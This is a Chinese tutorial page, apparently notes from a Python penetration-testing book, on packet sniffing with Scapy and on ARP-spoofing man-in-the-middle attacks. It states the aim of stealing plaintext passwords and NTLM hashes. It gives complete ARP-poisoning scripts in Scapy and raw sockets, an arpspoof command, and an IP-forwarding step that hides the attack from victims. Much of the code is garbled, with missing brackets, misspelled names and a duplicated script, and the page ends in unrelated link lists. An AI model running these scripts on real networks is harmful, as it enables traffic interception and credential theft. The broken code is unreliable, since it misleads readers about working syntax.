文章目录

  • 网络数据嗅探
    • 编写一个网络嗅探工具
    • 常见的过滤器。
    • 调用WireShark来查看数据包
  • ARP的原理与缺陷
    • 中间人欺骗
    • 编写一个完整的ARP欺骗程序
    • 使用 socket来实现例子

如果想要彻底了解一个网络,那么最好的办法就是对网络中的流量进行 嗅探
在本章中将会编写几个嗅探工具,这些嗅探工具可以用来窃取网络中 明文 传输的密码,监视网络中的数据流向,甚至可以收集远程登录所使用的NTLM数据包(这个数据包中包含登录用的用户名和使用Hash加密的密码)

网络数据嗅探

编写一个网络嗅探工具

在Scapy中提供了一种专门用来捕获数据包的函数sniff(),这个函数的功能十分强大,首先使用help函数来查看一下它的使用方法
help(sniff)

  • 函数sniff()中可以使用多个参数,下面先来了解其中几个比较重要参数的含义
    1)count:表示要捕获数据包的数量。默认值为0,表示不限制数量。
    2)store:表示是否要保存捕获到的数据包,默认值为1。
    3)prn:这个参数是一个函数,这个函数将会应用在每一个捕获到的数据包上。如果这个函数有返回值,将会显示出来。默认是空; 返回一个数据包信息
    4)iface:表示要使用的网卡或者网卡列表。

  • sniff()还支持了过滤器的使用
    1)这个过滤器使用了一种功能非常强大的过滤语法——“伯克利包过滤”语法。
    2)这个规则简称为BPF,利用它可确定该获取和检查哪些流量,忽略哪些流量。
    3)BPF可以帮助我们通过比较各个层协议中数据字段值的方法对流量进行过滤。
    4)BPF的主要特点是使用一个名为“原语”的方法来完成对网络数据包的描述,
    例如,可以使用“host”来描述主机,“port”来描述端口,同时也支持“与”“或”“非”等逻辑运算。可以限定的内容包括地址、协议

  • 使用这种语法创建出来的过滤器被称为BPF表达式,每个表达式包含一个或多个原语。每个原语中又包含一个或多个限定词,主要有三个限定词:Type、Dir和 Proto。
    1)Type用来规定使用名字或数字代表的类型,例如host、net和port等。
    2)Dir用来规定流量的方向,例如src、dst和src and dst等。
    3)Proto用来规定匹配的协议,例如ip、tcp和arp等。

“hos 192.168.76.128”就是一条最为常见的过滤器,它用来过滤掉除了本机和192.168.169.133以外的所有流量。如果希望再将范围限制小一些,例如,只捕获tcp类型的流量就可以使用“与”运算符,如“host 192.168.76.128 && tcp”。

常见的过滤器。

  • 只捕获与网络中某一个IP的主机进行交互的流量:“host 192.168.1.1”。

  • 只捕获与网络中某一个MAC地址的主机交互的流量:“ether host 00-1a-a0-52-e2-a0”。

  • 只捕获来自网络中某一个IP的主机的流量:“src host 192.168.1.1”。

  • 只捕获去往网络中某一个IP的主机的流量:“dst host 192.168.1.1”,host也可以省略。

  • 只捕获23端口的流量:“port 23”。

  • 捕获除了23端口以外的流量:“!23” 。

  • 只捕获目的端口为80的流量:“dst port 80”。

  • 只捕获ICMP流量:“icmp”。

  • 只捕获type为3,code为0的ICMP流量:“icmp[0] = 3 &&icmp[1] = 0”。 ([type,code]

  • 下面使用sniff()来捕获一些数据包并显示出来
    例如,源地址为192.168.76.128,端口为80的tcp报文

    sniff(filter='dst 192.168.76.128 and tcp port 80')
    

    这时Scapy就会按照要求开始捕获所需要的数据包。

  • 如果希望即时显示捕获的数据包,就可以使用 prn函数选项,
    函数的内容为prn=lambda x:x.summary()

    sniff(filter='dst 192.168.76.128 and tcp port 80',prn = lambda x:x.summary())
    

    利用prn就可以不断地打印输出捕获到的数据包的内

  • 这个函数可以实现很多功能,例如输出其中的某一个选项:使用 x[IP].src 输出IP报文的目的地址

    sniff(filter='dst 192.168.76.128 and tcp port 80',prn=lambda x:x[IP].src,count=5)
    
  • 在开启 sniff 的时候, 访问 目标主机的目标端口,(方式:火狐访问 HTTP服务器,产生流量开启sniff,进行流量获取)
    结果如下:

  • 另外,也可以定义一个回调函数,例如,打印输出这个数据包。

    def Callback(packet)
    print packet.show()
    
  • 然后再在sniff()中调用这个函数

    sniff(prn=Callback)
    
  • 这些捕获到的数据包可以使用wrpcap函数保存起来,保存的格式很多,目前最为通用的格式为pcap。

    例如,现在捕获5个数据包并保存起来的语句如下所示。 Pcap= -> wireshark 保存的 数据包 格式 就是 .

    pacppacket = sniff(count=5)
    wrpcap("demo.pcap", packet)
    
  • 接下来编写一个完整的数据嗅探工具,它可以捕获和特定主机通信的10个数据包,并保存到catch.pcap数据包中。

    from scapy.all import *
    import sys
    if len(sys.argv) != 2:  # sys.argv 运行脚本的时候, sys.arge 参数的个数print("Usage: catchPackets<IP>:\n eg: catchPackets 192.168.0.1")sys.exit(1)  # 退出程序
    ip = sys.argv[1]
    def Callback(packet):print(packet.show())
    packet = sniff(filter="host " + ip, prn=Callback, count=5)
    wrpcap("catch.pcap", packets)
    
  • 运行结果如图所示:

调用WireShark来查看数据包

在Scapy中查看这些数据包可能有些杂乱,可以将数据包放到更加专业的工具中来查看

  • 首先在Scapy中产生一个数据包。
 packets = IP(dst="www.baidu.com")/ICMP()
  • 然后可以将这个数据包放在一个极为优秀的网络分析工具中打开
wireshark(packets)

ARP的原理与缺陷

  • 之所以这里特别提到这个协议,是因为目前网络中大部分的监听和欺骗技术都是源于这个协议。
  • 但是这个协议存在一个重大缺陷,就是这个过程并没有任何的 认证机制
  • 也就是说如果一台主机收到ARP 请求数据包,并不会对这个数据包进行真伪判断,无论这个数据包是否真的来自源主机,都会将其添加到ARP表中。
  • 因此黑客就可能会利用这个漏洞来 冒充网关 等主机。

arpspoof来演示一下

arpspoof  [-i指定使用的网卡] [-t 要欺骗的目标主机] [-r] 要伪装成的主机

例如:
现在受到欺骗的主机会把攻击者当作网关,从而把所有的数据都发送到这个主机
Arpspoof 是以发送ARP 回复报文的形式 来 进行欺骗

  • 现在arpspoof完成了对目标主机的欺骗任务,可以截获到目标主机发往网关的数据包但是这里有两个问题:
    1.首先arpspoof仅仅是会截获这些数据包,并不能查看这些数据包,所以还需要使用专门查看数据包的工具
    打开WireShark,就可以看到 受害者所发送的数据
    2.第二点就是主机不会再将这些数据包转发到网关,这样将会导致目标主机无法正常上网,
    所以需要在主机上开启转发功能

    root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
    

这样就可以将截获到的数据包再转发出去,被欺骗的主机就可以正常上网了,从而无法察觉到受到攻击。

中间人欺骗

使用Scapy库来完成这个任务,再来看一遍ARP数据包的格式

这里需要设置的值主要有三个:op、psrc 和 pdst。其中,op对应的是ARP类型,默认值已经是1,就是ARP请求,无须改变;psrc的值最关键,psrc对应前面的源IP地址

gatewayIP="192.168.26.254"
victimIP="192.168.26.101"

另外,需要使用Ether层将这个数据包发送出去,查看一下Ether数据包的格式
这一层只有三个参数,dst是目的硬件地址,src是源硬件地址

srcMAC="00:0c:29:b4:07:1b
dstMAC="00:0c:29:2D:7F:89"

接下来构造并发送这个数据包

sendp(Ether(dst=dstMAC,src=srcMAC)/ARP( psrc=gatewayIP,pdst=victimIP)

即使不为Ether中的dst和src赋值,系统其实也会自动将src的值设置为使用Kali Linux 主机的硬件地址

sendp(Ether()/ARP(psrc=gatewayIP,pdst=victimIP))

成功发送这个数据包之后,查看一下被攻击计算机的ARP缓存表

编写一个完整的ARP欺骗程序

这个脚本 运行的时候 是欺骗 受害者的
在目标主机中查看ARP缓存表,可以看到这时这个缓存表已经受到欺骗

也可以将这个程序再完善一下,网络嗅探功能也加进来,同时欺骗受害者主机和网关,将硬件地址改为自动获取等。

首先编写一个能获取目标硬件地址的函数。
Scapy中有一个 getmacbyip() 函数,这个函数的作用是给出指定IP地址主机的硬件地址
在Python中使用这个函数来获取目标主机的硬件地址
如果要开始的是一次中间人欺骗,那么需要同时对目标主机和网关都进行欺骗

而中间人欺骗的原理就是要让目标主机误认为Kali Linux 才是网关,同时让网关误认为Kali Linux 才是目标主机,这样两者之间的通信方式就变成了如图所示的形式。

要实现这一点就需要同时向目标主机和网关发送欺骗数据包。

用来欺骗目标主机的数据包如下。

attackTarget = Ether()/ARP(psrc=gatewayIP,pdst=victimIP)

用来欺骗网关的数据包如下。

attackGateway= Ether()/ARP(psrc= victimIP,pdst= gatewayIP)

幻灯片 31:

因为ARP缓存表中表项都有生命周期,所以需要 不断 对两个主机进行欺骗。
这里使用循环发送来实现这个功能,sendp本身就有循环发送的功能,
使用inter指定间隔时间,使用loop=1来实现循环发送。

sendp(attackTarget, inter=1, loop=1)

接下来编写这个完整的程序。

#ARPPoison.py
import sys
import time
from scapy.all import sendp,ARP,Ether
if len(sys.argv)!=3:print sys.argv[0]+ ": <target><spoof_ip>"sys.exit(1
victimIP=sys.argv[1]
gatewayIP=sys.argv[2]
attackTarget=Ether()/ARP(psrc=gatewayIP,pdst=victimIP
attackGateway=Ether()/ARP(psrc=victimIP,pdst=gatewayIP
sendp(attackTarget, inter=1, loop=1)
sendp(attackGateway, inter=1, loop=1)
import sy
import time
from scapy.all import sendp,ARP,Ether
if len(sys.argv ) !=3 :print sys.argv[0]+ " : <target><spoof_ip>"sys.exit( 1)
victimIP=sys.argv[1
gatewayIP=sys.argv[2]
attackTarget=Ether()/ARP(psrc=gatewayIP, pdst=victimIP
attackGateway=Ether()/ARP(psrc=victimIP,pdst=gatewayIP
while 1:sendp(attackGatewaysendp(attackTarget)time.sleep(1

在主机上开启转发功能: root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward

使用 socket来实现例子

相比Scapy,socket是一个更为通用的库文件,但是也要复杂一些
首先看一下ARP数据包的格式,和以前不同,这一次要精确到每一位表示的含义

使用socket来产生一个数据包要远比Scapy麻烦,这个数据包要分成如下多个部分
(1)以太网目的地址,长度为6位。
(2)以太网源地址,长度为6位。
(3)帧类型,长度为两位。
(4)硬件类型,长度为两位。
(5)协议类型,长度为两位。
(6)硬件地址长度,长度为1位。
(7)协议地址长度,长度为1位。
(8)op,长度为两位。
(9)发送端以太网地址,长度为6位。
(10)发送端IP地址,长度为4位。
(11)目的以太网地址,长度为6位。
(12)目的IP地址,长度为4位。

利用这个库实现中间人欺骗的原理和前面一样,也是通过向目标发送一个伪造了的ARP请求数据包来实现的
可以按照如下来填充这个数据包。
(1)以太网目的地址:00:0c:29:2D:7F:89,这个表示要欺骗的主机的硬件地址,也可以是广播地址ff:ff:ff:ff:ff:ff。
(2)以太网源地址:00:0c:29:12:dd:23,这是本机的硬件地址。
(3)帧类型:0x0806表示ARP类型,使用两位十六进制表示为\x08\x06。
(4)硬件类型:1表示以太网,使用两位十六进制表示为\x00\x01。
(5)协议类型:8表示IPv4,使用两位十六进制表示为\x08\x00。
(6)硬件地址长度:\x06,表示6位的硬件地址。
(7)协议地址长度:\x04,表示4位的IP地址。
(8)op:1表示请求,2表示回应,使用两位十六进制表示为\x00\x01。
(9)发送端以太网地址:00:0c:29:12:dd:23。
(10)发送端IP地址:192.168.169.2。
(11)目的以太网地址:00:0c:29:2D:7F:89。
(12)目的IP地址:192.168.169.133。

在构造数据包的时候需要注意一点,网络中传输IP地址等数据要使用网络字节顺序,保证数据在不同主机之间传输时能够被正确解释
Python socket模块中包含一些有用的IP转换函数,说明如下。
(1)socket.inet_aton(ip_string):将IPv4的地址字符串(例如192.168.10.8)转换为32位打包的网络字节。
(2)socket.inet_aton(packed_ip):转换32位的IPv4网络字节为IP地址的标准点号分隔字符串表示
使用socket.inet_aton(ip_string)将IP地址转换之后才能发送出去,所以定义一下这个数据包的格式内容。

srcMAC="00:0c:29:12:dd:23"
dstMAC="00:0c:29:2D:7F:89"
code='\x08\x06'
htype = '\x00\x01'
protype = '\x08\x00'
hsize = '\x06'
psize = '\x04'
opcode = '\x00\x02'
gatewayIP = '192.168.169.2'
victimIP = '192.168.169.133'

将这些内容组成一个数据

packet=srcMAC + dstMAC + code + htype + protype + hsize + psize + opcode + srcMA + socket.inet_aton(gatewayIP) + dstMAC+socket.inet_aton(victimIP)

完整的程序如下所示。: 只是发给 被攻击的目标主机的 包; 还需要再构造一个 发给网关的数据包
同时 kali 开启流量转发

import socket
import struct
import binascii
s = socket.socket(socket.PF_PACKET,socket.SOCK_RAW, socket.ntoh(0x0800))
s.bind(("eht0",socket.htoh(0x0800)))
srcMAC ='\x00\x0c\x29\x23\x1e\xf4'
dstMAC =' \X00\x0C\x29\x2D\x7F\x89'
code = "\x08\x06"
htype = "\x00\X01"
protype = "\X08\x00"
hsize = "\x06"
psize = "\x04"
opcode = "\x00\x01"
gatewayIP = "192.168.169.2"
victimIP = "192.168.169.133"
packet=srcMAC + dstMAC + code + htype + protype + hsize + psize + opcode + srcMA + socket.inet_aton(gatewayIP) + dstMAC+socket.inet_aton(victimIP)
while 1:s.send(packet)

ARP 地址解析协议 根据IP地址,解析出 MAC地址,方式: 通过ARP的请求包,
以广播的形式发送到 目标主机, 目标主机收到广播包之后,进行单播回复。
RARP 反向地址解析
根据MAC地址,解析出IP地址

代理ARP:
实现场景,比如 主机不配置网关、或者 静态路由不配置下一跳,都可以借助 代理ARP实现通信
在广播网络环境下,配置静态路由,必须配置下一跳IP地址,因为 在封装数据的时候,ARP请求的是下一跳IP地址的MAC地址,如果不配置下一跳IP地址,ARP请求的是目标IP地址的MAC地址。

代理ARP可以解决 配置静态路由 不配置下一跳的问题

无故ARP/免费ARP
VRRP 虚拟路由冗余协议
VRRP协议中 无故ARP的应用
当一个VRRP 备份组完成选举之后, MASTER 接口会发出一个 无故ARP,用于通告 MASTER设备的MAC地址,用于流量的引导。
对于交换机来讲,交换机会将 虚拟mac地址对应的接口写入MAC地址表,用于流量的引导
对于普通用户来讲,成为Master的设备,通过发送无故ARP,告知用户,网关的MAC地址是多少。

DHCP 动态主机配置协议
在网络中,如果网络规模较大,不需要给计算机去手工配置IP地址,而是建立一台DHCP服务器,这个服务器中,有能用的地址----地址池, DHCP服务器将地址池中的地址,分配给主机---主机能够自动获取IP地址、网关信息、DNS信息等等。

DHCP Server  
DHCP Client

当DHCP主机 获取IP地址之后,会连续发送3个免费ARP,用于检测网络中是否存在IP地址冲突,如果放生冲突,则当前IP地址不可用。
一般,会将服务器(少量) 的IP地址固定下来(手写的),一般会在地址池中,排除掉这些固定的IP地址,避免下发的IP地址和 服务器的IP地址冲突。 192.168.1.100 – 192.168.1.254

无故ARP/免费ARP用于DHCP的功能。

Python渗透测试之网络嗅探与欺骗相关推荐

  1. 《Python渗透测试编程技术:方法与实践》:网络嗅探与欺骗

    第八章 网络嗅探与欺骗 漏洞渗透程序在网络中都以数据包形式传输,如果能对网络中的数据包进行分析,就可以深入掌握渗透原理,另外,很多网络攻击方法都是利用精心构造的数据包来完成,例如常见的ARP欺骗,利用 ...

  2. 网络嗅探与欺骗----函数sniff()、ARP的原理、ARP欺骗、AARP欺骗的中间人攻击

    网络嗅探与欺骗 如果想要彻底了解一个网络,那么最好的办法就是对网络中的流量进行嗅探 嗅探工具可以用来窃取网络中明文传输的密码,监视网络中的数据流向,甚至可以收集远程登录所使用的NTLM数据包(这个数据 ...

  3. Python渗透测试之ARP毒化和协议应用

    Python渗透测试之ARP毒化和协议应用 1. ARP毒化 ​ ARP毒化是一种比较老的渗透测试技术,通过ARP毒化技术分析并提取内网流量中的敏感信息,往往会有许多意外的收获. 1.1 工作原理 A ...

  4. 网络对抗技术_实验二_网络嗅探与欺骗

    中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验二 网络嗅探与欺骗     学生姓名 岳庆伟 年级 2014级 ...

  5. 实验二:网络嗅探与欺骗

    中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验二 网络嗅探与欺骗     学生姓名 康宏 年级 2015 区队 ...

  6. 实验二 网络嗅探与欺骗

    实验二 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验二 网络嗅探与欺骗     学生姓名 刘安然 学号 20 ...

  7. 【实验报告】二 网络嗅探与欺骗

    中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验二 网络嗅探与欺骗 学生姓名 岳婷 年级 14级 区队 二区队 指导 ...

  8. 实验二——网络嗅探与欺骗.

    中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验二 网络嗅探与欺骗     学生姓名 刘栋梁 年级 2014级 ...

  9. 网络对抗技术——网络嗅探与欺骗(第三部分)

    中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验二 网络嗅探与欺骗     学生姓名 袁昊晨 年级 2014 区 ...

  10. 网络对抗技术——网络嗅探与欺骗(第一二部分)非平台

    中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验二 网络嗅探与欺骗     学生姓名 翟一鸣 年级 2014 区 ...

最新文章

  1. Nginx——location配置
  2. 【响应式Web前端设计】Viewport解析
  3. 数据中心存储解决方案市场将迎来快速增长
  4. 编译报错+解决方法:错误: 找不到符号
  5. 服务器之select
  6. PowerDesiGner数据库设计
  7. 一篇文章带你快速理解微服务架构,由浅入深带你走进微服务架构的核心
  8. 图解金山网盾3.6下载保护实现原理
  9. 如何用Apache POI操作Excel文件-----如何对一个单元格加注解?
  10. 【系统架构】VC 开发辅助工具大收集
  11. 以$开头的shell脚本的变量
  12. Android手机sock5代理免root
  13. 全新UI聚合支付系统四方系统源码+升级修复漏洞完美版
  14. PHP100视频教程(2012-2013版)下载地址及密码
  15. lecture 16:DID双重差分方法
  16. JSjavascript获取B站封面图片超高清批量下载原图
  17. Could not build wheels for cryptography which use PEP 517 and cannot be installed directly
  18. 92 Three.js 使用设置bumpMap凹凸贴图创建褶皱
  19. 达人评测 i511400h和i710875h哪个好
  20. 记一次网络风暴/网络环路

热门文章

  1. [免费专栏] Android安全之绕过SSL Pinning抓HTTPS数据
  2. 深度总结,带你玩转 NVIDIA GPU
  3. 台式电脑设置同时访问内外网
  4. win10配置内外网同时使用
  5. 某个蝰蛇音效的卡刷包代码分析
  6. 小米手机 更换app图标失败的解决方法
  7. sin傅里叶变换公式_傅里叶变换公式(傅里叶变换常用公式)
  8. 等价类划分法测试用例
  9. Algorithm——A*路径规划算法原理详解
  10. 口袋妖怪模拟器android,口袋妖怪叶绿模拟器手机版